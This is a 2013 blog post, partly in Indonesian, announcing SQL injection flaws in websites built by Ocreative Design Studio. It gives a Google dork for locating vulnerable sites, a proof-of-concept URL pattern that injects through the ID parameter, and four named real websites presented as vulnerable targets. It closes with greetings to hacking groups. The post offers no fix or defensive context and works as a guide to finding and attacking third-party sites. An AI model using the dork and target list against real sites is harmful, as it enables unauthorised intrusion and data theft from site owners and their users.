Thursday, 7 November 2013

Ocreative Design Studio SQL Injection Vulnerabilites



: # Exploit Title : Ocreative Design Studio SQL Injection
Vulnerabilities
: # Date : 06 November 2013
: # Author : r1q
: # CMS Developer : http://www.ocreativedesign.com/
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : SQL Injection
: # Tested On : Google Chrome Version 26.0.1410.64 m (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Cisadane, X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club,


DORKS (Cara mencari situs targetnya) :
================================
intext:Web Design & Hosting by Ocreative Design Studio inurl:/?ID=

Atau kreasikan sendiri Google Dork sesuai kehendak kalian :)

Penjelasan
================

SQL Injection :
POC : http://[Site]/[Path]/?ID=[SQLi]
Contoh situs yang bercelah :
http://www.downtownhartland.com/event-de...hp?ID=499'
http://www.terrastaffing.com/contact-us/...ons/?ID=6'
http://www.wcfls.org/news.php?ID=177'
http://www.citypubnationwide.com/south-f...p?ID=7797'

Labels: ,

0 Comments:

Post a Comment

Subscribe to Post Comments [Atom]

<< Home